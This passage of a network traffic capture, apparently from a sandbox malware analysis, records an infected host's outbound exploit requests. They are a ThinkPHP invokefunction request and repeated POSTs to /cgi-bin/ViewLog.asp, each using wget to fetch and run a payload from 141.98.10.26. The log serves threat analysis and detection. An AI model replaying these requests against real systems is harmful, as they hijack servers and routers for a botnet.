Nov 22, 2023 08:39:43.196245909 CET	13727	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:14 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
677	192.168.2.23	34288	112.126.193.179	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:42.878289938 CET	13655	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:44.547961950 CET	13940	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:44.869775057 CET	13946	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:34 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
678	192.168.2.23	38186	94.121.133.30	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.430908918 CET	13814	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
679	192.168.2.23	59412	62.29.66.21	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.430984020 CET	13814	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
680	192.168.2.23	33812	94.120.12.90	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.431020975 CET	13815	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
681	192.168.2.23	54402	95.86.97.118	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.436155081 CET	13815	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
682	192.168.2.23	48242	95.217.214.100	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.628182888 CET	13819	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:43.823776960 CET	13824	IN	HTTP/1.1 426 Upgrade Required Content-Length: 16 Content-Type: text/plain Date: Wed, 22 Nov 2023 07:39:43 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 55 70 67 72 61 64 65 20 52 65 71 75 69 72 65 64 Data Ascii: Upgrade Required

Session ID	Source IP	Source Port	Destination IP	Destination Port
683	192.168.2.23	35090	62.87.204.168	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.645777941 CET	13821	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
684	192.168.2.23	60854	31.145.46.188	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.655757904 CET	13822	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:44.835887909 CET	13943	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:46.211699963 CET	14083	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.995184898 CET	14429	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:54.626481056 CET	15138	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:05.632852077 CET	16492	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.389925003 CET	19071	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:12.439610958 CET	19785	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
685	192.168.2.23	52252	62.244.11.113	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.854547024 CET	13825	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
686	192.168.2.23	36912	94.122.13.82	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.876638889 CET	13826	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
687	192.168.2.23	51018	94.121.155.248	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.883780003 CET	13827	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
688	192.168.2.23	46142	85.122.220.91	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:43.951312065 CET	13829	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
689	192.168.2.23	38954	94.187.117.205	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:44.413603067 CET	13936	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
690	192.168.2.23	34570	94.122.91.232	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:44.423012018 CET	13936	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
691	192.168.2.23	33268	31.136.125.183	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:44.816976070 CET	13942	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:45.379864931 CET	13992	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:46.499567986 CET	14123	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.739315033 CET	14367	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:53.346683979 CET	14945	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.305355072 CET	16097	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:21.246670008 CET	18342	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:58.105691910 CET	19777	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
692	192.168.2.23	40860	94.187.103.9	8080

Timestamp	kBytes transferred	Direction	Data
